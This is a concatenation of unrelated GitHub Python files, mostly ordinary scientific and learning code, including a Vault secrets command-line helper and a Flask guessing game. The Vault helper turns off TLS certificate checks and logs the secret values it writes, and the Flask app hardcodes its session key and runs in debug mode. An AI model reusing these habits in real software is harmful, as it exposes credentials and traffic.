[glied_1,glied_2]:\n schablone.append(eintrag)\n return list(filter(lambda x: x!=None,schablone))\n\ndef termVgl(original,nullst):\n nullst=round(nullst,3)\n letters=\"abcdefghijklmnopqrstuvwxyz\"\n copy =termSchablone(original[0][1]-1,nullst)\n erg =[]\n for wertePaar in original:\n erg.append([wertePaar[0],wertePaar[1]])\n ##print(\"erg\",erg)\n ##print(\"schablone\",copy)\n return gleichung(erg,copy)\n\n\nif __name__ == '__main__':\n term =main(\"x^3 -11x^2 +39x -45\")\n ###print(term)\n nullst =nullstelle(-100,100,term)\n #schablone =termSchablone(term[0][1]-1,nullst)\n ###print(schablone)\n newTerm =termVgl(term,nullst)\n print(newTerm)\n nullst_1 =nullstelle(-100.0,100.0,newTerm)\n print(nullst_1)\n term_lst =termVgl(newTerm,nullst_1)\n print(nullstelle(-100.0,100.0,term_lst))\n","repo_name":"masssi164/test","sub_path":"kurvendiskussion/logic/koeffizientenVgl.py","file_name":"koeffizientenVgl.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9669805177","text":"from collections import namedtuple\nimport copy\nfrom dataclasses import dataclass, field\nfrom datetime import datetime\nimport json\nimport matplotlib.pyplot as plt\nimport matplotlib.pylab as pl\nimport numpy as np\nimport os\nimport pathlib\n\nimport pprint\nimport traceback\n\nimport pandas as pd\nfrom pandas import DataFrame\n\nimport time_utils\nfrom time_utils import DateRange\nfrom score_hv.harvester_base import harvest\nfrom expt_metrics import ExptMetricInputData, ExptMetricRequest\nfrom innov_stats_plot_attrs import plot_attrs, region_labels\n\n\nRequestData = namedtuple(\n 'RequestData',\n [\n 'datetime_str',\n 'experiment',\n 'metric_format_str',\n 'metric',\n 'stat',\n 'regions',\n 'elevation_unit',\n 'time_valid'\n ],\n)\n\n\n@dataclass\nclass StatGroupData:\n stat_group_dict: dict\n cycles: list = field(default_factory=list, init=False)\n stat_group_frmt_str: str = field(default_factory=str, init=False)\n metrics: list[str] = field(init=False)\n stats: list[str] = field(init=False)\n regions: list[str] = field(init=False)\n elevation_unit: str = field(init=False)\n\n def __post_init__(self):\n self.cycles = self.stat_group_dict.get('cycles')\n self.stat_group_frmt_str = self.stat_group_dict.get('stat_group_frmt_str')\n self.metrics = self.stat_group_dict.get('metrics')\n self.stats = self.stat_group_dict.get('stats')\n self.regions = self.stat_group_dict.get('regions')\n self.elevation_unit = self.stat_group_dict.get('elevation_unit')\n\n\ndef get_experiment_metrics(request_data):\n \n expt_metric_name = request_data.metric_format_str.replace(\n '{metric}', request_data.metric\n )\n\n expt_metric_name = expt_metric_name.replace(\n '{stat}', request_data.stat\n )\n\n time_valid_from = datetime.strftime(\n request_data.time_valid.start, request_data.datetime_str)\n\n time_valid_to = datetime.strftime(\n request_data.time_valid.end, request_data.datetime_str)\n\n request_dict = {\n 'name': 'expt_metrics',\n 'method': 'GET',\n 'params': {\n 'datestr_format': request_data.datetime_str,\n 'filters': {\n 'experiment': request_data.experiment, \n 'metric_types': {\n 'name': {\n 'exact': [expt_metric_name]\n },\n 'stat_type': {\n 'exact': [request_data.stat]\n }\n },\n 'regions': {\n 'name': {\n 'exact': request_data.regions\n },\n },\n 'time_valid': {\n 'from': time_valid_from,\n 'to': time_valid_to,\n },\n 'elevation_unit': {\n 'exact': [request_data.elevation_unit]\n }\n },\n 'ordering': [\n {'name': 'time_valid', 'order_by': 'asc'},\n {'name': 'elevation', 'order_by': 'desc'}\n ]\n }\n }\n\n print(f'request_dict: {request_dict}')\n\n emr = ExptMetricRequest(request_dict)\n result = emr.submit()\n\n return result.details['records']\n\n\ndef build_base_figure():\n fig = plt.figure()\n ax = plt.subplot()\n # ax.cla()\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n plt.tick_params(\n axis='x',\n which='both',\n bottom=False,\n top=False,\n labelbottom=True\n )\n \n return (plt, fig, ax)\n\n\ndef format_figure(plt, ax, pa, region_label):\n\n plt.title(region_label)\n plt.gca().set_xlim([pa.axes_attrs.xmin, pa.axes_attrs.xmax])\n plt.gca().set_ylim([pa.axes_attrs.ymin, pa.axes_attrs.ymax])\n \n xticks = np.arange(\n pa.axes_attrs.xmin,\n (pa.axes_attrs.xmax + 1.e-6),\n pa.axes_attrs.xint\n ) \n plt.xticks(xticks)\n \n plt.xlabel(\n xlabel=pa.xlabel.label,\n horizontalalignment=pa.xlabel.horizontalalignment\n )\n \n plt.ylabel(\n ylabel=pa.ylabel.label,\n horizontalalignment=pa.ylabel.horizontalalignment\n )\n \n plt.gca().invert_yaxis()\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n \n if pa.stat == 'bias':\n plt.vlines(\n x=0.0,\n ymin=pa.axes_attrs.ymin,\n ymax=pa.axes_attrs.ymax,\n linestyles='dashed',\n colors='gray',\n linewidth=0.5\n )\n\n plt.legend(\n loc=pa.legend.loc,\n fancybox=pa.legend.fancybox,\n edgecolor=pa.legend.edgecolor,\n framealpha=pa.legend.framealpha,\n shadow=pa.legend.shadow,\n facecolor=pa.legend.facecolor,\n )\n\n\ndef build_fig_dest(\n work_dir,\n fig_base_fn,\n metric,\n stat,\n region,\n date_range\n):\n \n start = datetime.strftime(date_range.start, '%Y%m%dT%HZ')\n end = datetime.strftime(date_range.end, '%Y%m%dT%HZ')\n dest_fn = fig_base_fn\n dest_fn += f'__{metric}_{stat}_{region}__{start}_to_{end}.png'\n \n dest_full_path = os.path.join(work_dir, dest_fn)\n \n parent_dir = pathlib.Path(dest_full_path).parent\n pathlib.Path(parent_dir).mkdir(parents=True, exist_ok=True)\n return dest_full_path\n\n\ndef save_figure(plt, dest_full_path):\n print(f'saving figure to {dest_full_path}')\n plt.savefig(dest_full_path)\n\n\ndef plot_innov_stats(\n experiments,\n metric,\n stat,\n metrics_df,\n work_dir,\n fig_base_fn,\n date_range\n):\n\n if not isinstance(metrics_df, DataFrame):\n msg = 'Input data to plot_innov_stats must be type pandas.DataFrame '\\\n f'was actually type: {type(metrics_df)}'\n raise TypeError(msg)\n \n plt_attr_key = f'{metric}_{stat}'\n pa = plot_attrs[plt_attr_key]\n \n ave_df = metrics_df.groupby(\n ['expt_name', 'elevation', 'region'], as_index=False\n )['value'].mean()\n \n # loop through regions\n regions = ave_df.drop_duplicates(\n ['region'], keep='last'\n )['region'].values.tolist()\n \n expt_names = ave_df.drop_duplicates(\n ['expt_name'], keep='last'\n )['expt_name'].values.tolist()\n\n for region in regions:\n # if region != 'global':\n # continue\n\n (plt, fig, ax) = build_base_figure()\n\n for expt in experiments:\n \n expt_name = expt.get('expt_name')\n stat_vals = ave_df.loc[\n (ave_df['region'] == region) &\n (ave_df['expt_name'] == expt_name),\n 'value'\n ]\n\n elevations = ave_df.loc[\n (ave_df['region'] == region) &\n (ave_df['expt_name'] == expt_name),\n 'elevation'\n ]\n\n plt.plot(\n stat_vals,\n elevations,\n color=expt.get('graph_color'),\n label=expt.get('graph_label')\n )\n \n format_figure(plt, ax, pa, region_labels[region])\n\n fig_fn = build_fig_dest(\\\n work_dir,\n fig_base_fn,\n metric,\n stat,\n region,\n date_range\n )\n\n save_figure(plt, fig_fn)\n\n\n@dataclass\nclass ExperimentData(object):\n name: str\n wallclock_start: str\n graph_color: str\n graph_label: str\n \n def get_dict(self):\n return {\n 'name': {\n 'exact': self.name\n },\n 'wallclock_start': {\n 'from': self.wallclock_start,\n 'to': self.wallclock_start\n },\n 'expt_name': self.name,\n 'expt_start': self.wallclock_start,\n 'graph_label': self.graph_label,\n 'graph_color': self.graph_color\n }\n\n\n@dataclass\nclass PlotInnovStatsRequest(object):\n config_dict: dict\n date_range: DateRange = field(init=False)\n stat_groups: list = field(default_factory=list, init=False)\n datetime_str: str = field(default_factory=str, init=False)\n experiments: list = field(default_factory=list, init=False)\n work_dir: str = field(default_factory=str, init=False)\n fig_base_fn: str = field(default_factory=str, init=False)\n\n def __post_init__(self):\n date_range_dict = self.config_dict.get('date_range')\n self.datetime_str = date_range_dict.get('datetime_str')\n start_str = date_range_dict.get('start')\n end_str = date_range_dict.get('end')\n \n self.experiments = self.get_experiments(self.config_dict)\n \n try:\n start = datetime.strptime(start_str, self.datetime_str)\n end = datetime.strptime(end_str, self.datetime_str)\n except Exception as err:\n trcbk = traceback.format_exc()\n msg = f'Problem parsing date range: {date_range_dict}, ' \\\n f'err: {trcbk}'\n print(f'{msg}')\n raise ValueError(msg) from err\n\n self.date_range = DateRange(start, end)\n\n stat_groups = self.config_dict.get('stat_groups')\n if not isinstance(stat_groups, list):\n trcbk = traceback.format_exc()\n msg = 'No stat_groups key found or invalid type: ' \\\n f'stat_groups: {stat_groups}, type(stat_groups): ' \\\n f'{type(stat_groups)}, err: {trcbk}'\n raise TypeError(msg)\n\n for stat_group_dict in stat_groups:\n if not isinstance(stat_group_dict, dict):\n trcbk = traceback.format_exc()\n msg = 'stat_group_dict is invalid type: ' \\\n f'stat_group_dict: {stat_group_dict}, ' \\\n f'type(stat_group_dict): {type(stat_group_dict)}, ' \\\n f'err: {trcbk}'\n raise TypeError(msg)\n\n self.stat_groups.append(StatGroupData(stat_group_dict))\n \n self.work_dir = self.config_dict.get('work_dir')\n self.fig_base_fn = self.config_dict.get('fig_base_fn')\n\n\n def get_experiments(self, config_dict):\n \n experiments = config_dict.get('experiments')\n if not isinstance(experiments, list):\n msg = 'The \\'experiments\\' must be type list, actually ' \\\n f'{type(experiments)}'\n raise TypeError(msg)\n\n experiments_data = []\n for experiment in experiments:\n if not isinstance(experiment, dict):\n msg = 'Each \\'experiment\\' must be type dict, actually ' \\\n f'{type(experiment)}'\n raise TypeError(msg)\n \n name = experiment.get('name')\n wallclk_strt = experiment.get('wallclock_start')\n graph_color = experiment.get('graph_color')\n graph_label = experiment.get('graph_label')\n expt_data = ExperimentData(\n name, wallclk_strt, graph_color, graph_label\n )\n experiments_data.append(expt_data.get_dict())\n\n return experiments_data\n\n\n def submit(self):\n \n master_list = []\n n_hours = 6\n n_days = 0\n\n finished = False\n loop_count = 0\n \n for stat_group in self.stat_groups:\n elevation_unit = stat_group.elevation_unit\n metrics_data = []\n # gather experiment metrics data for experiment and date range\n for metric in stat_group.metrics:\n for stat in stat_group.stats:\n m_df = DataFrame()\n for experiment in self.experiments:\n request_data = RequestData(\n self.datetime_str,\n experiment,\n stat_group.stat_group_frmt_str,\n metric,\n stat,\n stat_group.regions,\n stat_group.elevation_unit,\n self.date_range\n )\n\n e_df = get_experiment_metrics(request_data)\n e_df = e_df.sort_values(['expt_name', 'region', 'elevation'])\n m_df = pd.concat([m_df, e_df], axis=0)\n\n plot_innov_stats(\n self.experiments,\n metric,\n stat,\n m_df,\n self.work_dir,\n self.fig_base_fn,\n self.date_range\n )\n","repo_name":"NOAA-PSL/score-db","sub_path":"src/plot_innov_stats.py","file_name":"plot_innov_stats.py","file_ext":"py","file_size_in_byte":12533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14653670574","text":"from flask import Flask, render_template, request, redirect, session\nimport random\n\napp = Flask(__name__)\napp.secret_key = '91^64.3[4 42'\n\n@app.route('/')\ndef index():\n\n if not session.get('myNum'): # its a good thing the range starts at 1; i learned that if you hold a 0 in\n # the variable using this kind of check then\n # the conditional will trigger and you end up with always initializing the \n # variable whenever the route is called. Obvious, after the fact\n session['myNum'] = random.randint(1,100)\n session['colorDiff'] = 200\n print('My number is', session['myNum'])\n \n return render_template('index.html')\n\n@app.route('/check', methods=['POST'])\ndef check():\n userGuess = request.form\n \n g = int(userGuess['guess'])\n mn= int(session['myNum'])\n d = g - mn \n session['colorDiff'] = d # I computed the difference between the guess and the random number.\n # That allows for very specific and direct comparisons. Originally I\n # was going to be cute and make the color change as graded by the difference\n # but maybe another time. The math involved in doing that on an RGB seems waay\n # beyond the scope of this project and my desire to do it\n\n return redirect('/')\n\n@app.route('/reset')\ndef reset():\n session.clear()\n return redirect('/')\n\n@app.errorhandler(404)\ndef unknown(err):\n return '404 : NOT FOUND!'\n\nif __name__==\"__main__\":\n app.run(debug=True)","repo_name":"Pat-Tee/CodingDojo","sub_path":"Python/GreatNumberGame/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7186478057","text":"from collections.abc import Sequence\nfrom decimal import Decimal\n\ndef format(\n number: Decimal | float | str,\n decimal_sep: str,\n decimal_pos: int | None = ...,\n grouping: int | Sequence[int] = ...,\n thousand_sep: str = ...,\n force_grouping: bool = ...,\n use_l10n: bool | None = ...,\n) -> str: ...\n","repo_name":"blakeNaccarato/pylance-stubs-unofficial","sub_path":"django-stubs/utils/numberformat.pyi","file_name":"numberformat.pyi","file_ext":"pyi","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"75067623","text":"from transformers import WhisperForConditionalGeneration, WhisperFeatureExtractor, WhisperProcessor\nimport torch\nimport torchaudio\nfrom torchaudio.functional import resample\n\ndef transcribe(path):\n raw_audio, sr = torchaudio.load(path)\n sr = 16000\n #raw_audio = resample(waveform=raw_audio, orig_freq=sr, new_freq=16000)\n raw_audio = raw_audio.squeeze(dim = 0)\n # feature_extractor = WhisperFeatureExtractor.from_pretrained(\"openai/whisper-tiny\")\n processor = WhisperProcessor.from_pretrained(\"openai/whisper-tiny\")\n\n model = WhisperForConditionalGeneration.from_pretrained(\"openai/whisper-tiny\").cuda()\n input_features = processor(raw_audio, sampling_rate=sr, return_tensors=\"pt\").input_features\n with torch.no_grad():\n generated_ids = model.generate(input_features.to(\"cuda\"), language=\"<|ja|>\", task=\"transcribe\")[0]\n transcription = processor.decode(generated_ids)\n return processor.tokenizer._normalize(transcription)\n\ndef main():\n path = \"data/data/clean/my_audio_0.wav\"\n result = transcribe(path)\n print(\"\")\n print(result)\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"Shiiya0418/Whisper-Sample-for-Jetson","sub_path":"fast_asr.py","file_name":"fast_asr.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23678693112","text":"from sklearn.metrics import confusion_matrix, classification_report\nimport matplotlib.pyplot as plt\n\ndef evaluate_model(model, test_generator):\n # Evaluate the model on the test data\n score = model.evaluate(test_generator, verbose=0)\n\n # Print the test loss and accuracy\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n\ndef plot_confusion_matrix(model, test_generator):\n # Generate predictions\n y_pred = model.predict(test_generator)\n y_true = test_generator.classes\n\n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n\n # Plot confusion matrix\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n plt.title('Confusion matrix')\n plt.colorbar()\n plt.tight_layout()\n plt.show()\n\ndef plot_learning_curve(history):\n # Plot training & validation accuracy values\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('Model accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\n # Plot training & validation loss values\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n","repo_name":"Shahupdates/cnnClassification","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6206559381","text":"#!/usr/bin/python3.5\n\nfrom __future__ import print_function\nimport hvac\nimport argparse\nimport getpass\nimport json\nimport sys\n\ndefault_vault_server = 'https://bcon.prod.wow.avvo.com:8200'\nvault_root_path = 'services/jobrunner/credentials/secret/'\n\ndef log_console(*args, **kwargs):\n print(__file__ + ': ', file=sys.stderr, end='')\n print(*args, file=sys.stderr, **kwargs)\n\ndef get_client(vault_server=default_vault_server, vault_appid=None):\n client = hvac.Client(url=vault_server, verify=False)\n vault_user = getpass.getuser()\n\n log_console('Connecting [%s] to vault server [%s] using %s' %\n (vault_user, vault_server, 'ldap' if vault_appid is None else 'appid'))\n if vault_appid is None:\n client.auth_ldap(vault_user, getpass.getpass(prompt='Please enter your password to connect to vault: '))\n else:\n client.auth_app_id(vault_appid, vault_user)\n\n log_console('Vault key root path: [%s]' % vault_root_path)\n return client\n\ndef read_key(client, key, showToConsole=False):\n log_console('Reading key [%s] from vault' % key)\n secret_value = client.read(vault_root_path + key)\n value = secret_value['data']['value']\n if showToConsole:\n print(value)\n return value\n\ndef write_key(client, key, value):\n log_console('Writing key [%s] with value [%s] into vault' % (key, value))\n client.write(vault_root_path + key, value=value)\n log_console('Done')\n\ndef delete_key(client, key):\n log_console('Deleting key [%s] from vault' % key)\n client.delete(vault_root_path + key)\n log_console('Done')\n\ndef list_key(client):\n log_console('Listing keys from vault')\n print(client.list(vault_root_path))\n log_console('Done')\n\ndef vault_action(args, vault_server):\n client = None\n try:\n if args.action == 'read':\n client = get_client(vault_server, vault_appid=args.appid)\n read_key(client, args.key, showToConsole=True)\n elif args.action == 'write':\n client = get_client(vault_server, vault_appid=args.appid)\n write_key(client, args.key, args.value)\n elif args.action == 'delete':\n client = get_client(vault_server, vault_appid=args.appid)\n delete_key(client, args.key)\n elif args.action == 'list':\n client = get_client(vault_server, vault_appid=args.appid)\n list_key(client)\n else:\n log_console('Invalid action, only support read/write/delete')\n exit(1)\n\n finally:\n if client is not None:\n client.logout()\n\nif __name__ == '__main__':\n \"\"\"This script allows easier access to vault from cluster/gateway\"\"\"\n\n parser = argparse.ArgumentParser(description = 'Read, write/update, or delete vault key used by the data team')\n parser.add_argument('--vault_server', required=False, default=default_vault_server, help='the vault server to connect to')\n parser.add_argument('--appid', required=False, default=None, help='the vault app id to be used instead of ldap')\n\n subparsers = parser.add_subparsers(help='vault actions')\n subparsers.required = True\n subparsers.dest = 'action'\n\n # create the parser for the 'read' command\n parser_read = subparsers.add_parser('read', help='read a key from vault store')\n parser_read.add_argument('--key', required=True, help='the vault key to be operated on')\n\n # create the parser for the 'write' command\n parser_write = subparsers.add_parser('write', help='write a key to vault store')\n parser_write.add_argument('--key', required=True, help='the vault key to be operated on')\n parser_write.add_argument('--value', required=True, help='value of the vault key to be written')\n\n # create the parser for the 'delete' command\n parser_delete = subparsers.add_parser('delete', help='delete a key from vault store')\n parser_delete.add_argument('--key', required=True, help='the vault key to be operated on')\n\n # create the parser for the 'list' command\n parser_list = subparsers.add_parser('list', help='list all entries under given key from vault store')\n\n args = parser.parse_args()\n\n vault_action(args, args.vault_server)\n","repo_name":"rlee21/snippets","sub_path":"python/wdep/scripts/data_vault.py","file_name":"data_vault.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40791698309","text":"from datetime import datetime\nfrom bson.binary import UUIDLegacy\n\nfrom database import Database\n\n__author__ = 'jamie'\n\nCOLLECTION = \"aroundtheworld\"\n\n\nclass AroundTheWorld(object):\n\n @staticmethod\n def add_game(_id, name, numberOfDarts, numberOfDartsAtEachNumber, mode):\n\n if Database.insert(COLLECTION, {\"_id\": _id, \"username\": name, \"numberOfDarts\": numberOfDarts, \"numberOfDartsAtEachNumber\":\n numberOfDartsAtEachNumber, \"mode\": mode, \"date\": datetime.now()}):\n return True\n return False\n\n @staticmethod\n def get_games(name):\n games = Database.find(COLLECTION, {\"username\": name}, \"date\")\n return games\n\n @staticmethod\n def get_by_id(game_id):\n game = Database.find_one(COLLECTION, {\"_id\": UUIDLegacy(game_id)})\n return game\n\n @staticmethod\n def get_leaderboard(numResults = None):\n if numResults:\n results = Database.find(COLLECTION, {}, \"numberOfDarts\", 1, numResults)\n else:\n results = Database.find(COLLECTION, {}, \"numberOfDarts\", 1)\n\n return results\n","repo_name":"jkerr123/darts-scorer","sub_path":"src/models/aroundtheboard.py","file_name":"aroundtheboard.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13269036116","text":"import argparse\nimport sys\nimport random\nfrom Bio import SeqIO\n\ndef GetArgs():\n def ParseArgs(parser):\n class Parser(argparse.ArgumentParser):\n def error(self, message):\n sys.stderr.write('error: %s\\n' % message)\n self.print_help()\n sys.exit(2)\n\n parser = Parser(description='Sample sequences form A GISAID FASTA file.')\n parser.add_argument('-i', '--input_file',\n required = True,\n help = 'Input FASTA file (required). Fasta file headers must have been reformatted with gisaid_reformat_fasta_headers.py',\n type = str)\n parser.add_argument('-o', '--output_file',\n required = True,\n help = 'Output Fasta file (required).',\n type = str)\n parser.add_argument('-n', '--num_samples',\n required = False,\n help = 'Number of sequences to sample. (default = 1000)',\n default = 1000,\n type = int)\n \n return parser.parse_args()\n\n parser = argparse.ArgumentParser()\n args = ParseArgs(parser)\n \n return args\n\ndef main():\n args = GetArgs()\n input_file = args.input_file\n output_file = args.output_file\n num_samples = args.num_samples\n \n seqs = dict()\n for seq in SeqIO.parse(input_file, 'fasta'):\n seqs[seq.id] = seq\n \n seq_ids = random.sample(list(seqs.keys()), k=num_samples)\n \n f = open(output_file, 'w')\n for k in seq_ids:\n SeqIO.write(seqs[k], f, 'fasta')\n f.close()\n \nif __name__ == '__main__':\n main()","repo_name":"analytic-garden/B.1.1.7-Mutations","sub_path":"gisaid_sample_seqs.py","file_name":"gisaid_sample_seqs.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13768827263","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.layers.experimental import preprocessing\n\nnp.set_printoptions(precision=3, suppress=True)\n\n# Read dataset from file\nraw_dataset = pd.read_csv(\"../data/1160629000_121_308_train_receive.csv\", index_col=None)\nraw_dataset = raw_dataset.astype({'index':'float','event_time':'float', 'value':'int', 'valueThreshold':'int', 'isActive':'bool'})\ndataset = raw_dataset.copy()\ndataset = dataset.dropna().drop(['isActive'], axis=1)\ndataset['event_time'] = (dataset['event_time']-1487508915.0)/1000\n\n# Split data into training and testing\ntrain_dataset = dataset.sample(frac=0.8, random_state=0)\ntest_dataset = dataset.drop(train_dataset.index)\n\n# Split input features and lables\ntrain_features = train_dataset.copy()\ntest_features = test_dataset.copy()\ntrain_labels = train_features.pop('event_time')\ntest_labels = test_features.pop('event_time')\n\n# Normalize whole dataset\nnormalizer = preprocessing.Normalization()\nnormalizer.adapt(np.array(train_features))\n\n# Model Init fucntion\ndef build_and_compile_model(norm):\n inputs = tf.keras.layers.Input(shape=(3,))\n model = keras.Sequential([\n inputs,\n norm,\n layers.Dense(64, activation='relu'),\n layers.Dense(64, activation='relu'),\n layers.Dense(1)\n ])\n # Setup optimizer, learning rate, and loss function\n model.compile(loss='mean_absolute_error',\n optimizer=tf.keras.optimizers.Adam(0.001))\n return model\n\nDNN_multi_var_model = build_and_compile_model(normalizer)\n\n# Save Train loss each epochs for later analysis\nhistory = DNN_multi_var_model.fit(\n train_features, train_labels,\n validation_split=0.2,\n verbose=0, epochs=100)\n\n# Plot loss during training\n# def plot_loss(history):\n# plt.plot(history.history['loss'], label='loss')\n# plt.plot(history.history['val_loss'], label='val_loss')\n# plt.ylim([0, 10])\n# plt.xlabel('Epoch')\n# plt.ylabel('Error [event_time]')\n# plt.legend()\n# plt.grid(True)\n# plt.show()\n# plot_loss(history)\n\n# Evaluate model in testing dataset\ntest_results = {}\ntest_results['DNN_multi_var_model'] = DNN_multi_var_model.evaluate(test_features, test_labels, verbose=0)\nprint (pd.DataFrame(test_results, index=['Mean absolute error [event_time]']).T)\n\nDNN_multi_var_model.save(\"../exported_models/DNN_multi_regression\")\nconverter = tf.lite.TFLiteConverter.from_saved_model(\"../exported_models/DNN_multi_regression\")\ntflite_model = converter.convert()\nopen(\"../exported_models/tflite_model/DNN_multi_regression.tflite\", \"wb\").write(tflite_model)\n\n# Ploting result\n# test_predictions = DNN_multi_var_model.predict(test_features).flatten()\n# a = plt.axes(aspect='equal')\n# plt.scatter(test_labels, test_predictions)\n# plt.xlabel('True Values [event_time]')\n# plt.ylabel('Predictions [event_time]')\n# lims = [0, 50]\n# plt.xlim(lims)\n# plt.ylim(lims)\n# _ = plt.plot(lims, lims)\n# plt.show()\n\n\n","repo_name":"rdsea/sys4bigml","sub_path":"tutorials/edgemodelop/edge_client/edge_machine_learning/DNN_multiple_regression.py","file_name":"DNN_multiple_regression.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71124649332","text":"#!/usr/bin/env python3\n\nimport numpy\nimport unittest\nfrom afqmctools.analysis.extraction import extract_observable\nfrom afqmctools.analysis.average import average_one_rdm\n\n\nclass TestRDM(unittest.TestCase):\n\n def test_average(self):\n f = 'qmc.s000.stat.h5'\n # Old format\n # base = 'Observables/BackPropagated/FullOneRDM/Average_1'\n rdm_av, rdm_errs = average_one_rdm(f, eqlb=1, ix=1)\n self.assertAlmostEqual(2*numpy.sum(rdm_av.real), 9.990239713872079)\n self.assertAlmostEqual(2*numpy.sum(rdm_av.imag), 0.009522316560114931)\n\n def test_extract(self):\n f = 'qmc.s000.stat.h5'\n # Old format\n # base = 'Observables/BackPropagated/FullOneRDM/Average_0'\n dm = 2*extract_observable(f, ix=0)\n self.assertAlmostEqual(numpy.sum(dm.real), 499.49878268185375)\n self.assertAlmostEqual(numpy.sum(dm.imag), 1.2453436020111393)\n\n def test_extract_single(self):\n f = 'qmc.s000.stat.h5'\n # base = 'Observables/BackPropagated/FullOneRDM/Average_3'\n dm = extract_observable(f, ix=3, sample=37)\n self.assertAlmostEqual(numpy.sum(dm).real, 5.00103256421043)\n\n\nif __name__ == '__main__':\n import sys\n import os\n dir_path = os.path.dirname(os.path.realpath(__file__))\n sys.path.append(os.path.join(dir_path, '../'))\n from check_h1e_conv import plot_convergence\n plot_convergence('qmc.s000.stat.h5')\n unittest.main()\n","repo_name":"QMCPACK/qmcpack","sub_path":"examples/afqmc/06-methane_converge_back_prop/reference/test_obs.py","file_name":"test_obs.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"21"} +{"seq_id":"5723750119","text":"from imporlist import *\r\nfrom gamefiles.abilities import Abilities\r\n\r\nclass Unit:\r\n def __init__(self) -> None:\r\n self.position = [SCREENWIDTH//2, SCREENHEIGHT//2]\r\n self.player = pygame.Surface((PLAYERSIZE, PLAYERSIZE))\r\n print(\"pos: %s %s\" % (self.position, self.player))\r\n\r\nclass Player(Unit, Abilities):\r\n def __init__(self) -> None:\r\n super().__init__()\r\n # self.position = [SCREENWIDTH//2, SCREENHEIGHT//2]\r\n # self.player = pygame.Surface((PLAYERSIZE, PLAYERSIZE))\r\n self.player.fill(PLAYERCOLOR)\r\n\r\n\r\n def collect_inputs(self) -> None:\r\n pressed = pygame.key.get_pressed()\r\n\r\n if pressed[pygame.K_RIGHT]:\r\n print(\"K_RIGHT\")\r\n self.position[0] += STEPSIZE\r\n\r\n if pressed[pygame.K_LEFT]:\r\n print(\"K_LEFT\")\r\n self.position[0] -= STEPSIZE\r\n \r\n if pressed[pygame.K_UP]:\r\n print(\"K_UP\")\r\n self.position[1] -= STEPSIZE\r\n \r\n if pressed[pygame.K_DOWN]:\r\n print(\"K_DOWN\")\r\n self.position[1] += STEPSIZE\r\n \r\n if pressed[pygame.K_SPACE]:\r\n print(\"K_PSACE\")\r\n # self.pulse_aoe = True\r\n\r\n\r\n def move(self, surface):\r\n surface.blit(self.player, self.position)","repo_name":"BanyaszJ/UntitledShapeGame","sub_path":"gamefiles/units.py","file_name":"units.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74436243574","text":"#!/usr/bin/python3\n\"\"\"\nSquare with area\n\"\"\"\n\n\nclass Square:\n \"\"\"\n definition of a square\n \"\"\"\n def __init__(self, size=0):\n \"\"\"\n Args:\n size: size of square\n \"\"\"\n if type(size) is not int:\n raise TypeError(\"size must be an integer\")\n elif size < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = size\n\n def area(self):\n \"\"\"\n returns area of a square\n \"\"\"\n return(self.__size ** 2)\n","repo_name":"Chezzo-codes/alx-higher_level_programming","sub_path":"0x06-python-classes/3-square.py","file_name":"3-square.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27005276320","text":"# i=1\r\n# while i<=5:\r\n# j=1\r\n# while j<=5:\r\n# print(\"*\",end=\" \")\r\n# j+=1\r\n# print()\r\n# i+=1\r\n \r\nrow=1\r\ni=0\r\nj=4\r\nwhile i<=7:\r\n column=1\r\n while column<=5:\r\n if column==1 or (row==column+2 and column>1):\r\n print(\"*\",end=\"\")\r\n elif ((row==i and column==j) and column>0):\r\n print(\"*\",end=\"\")\r\n column+=1\r\n i+=1\r\n j-=1\r\n \r\n print() \r\n row+=1\r\n\r\n\r\n 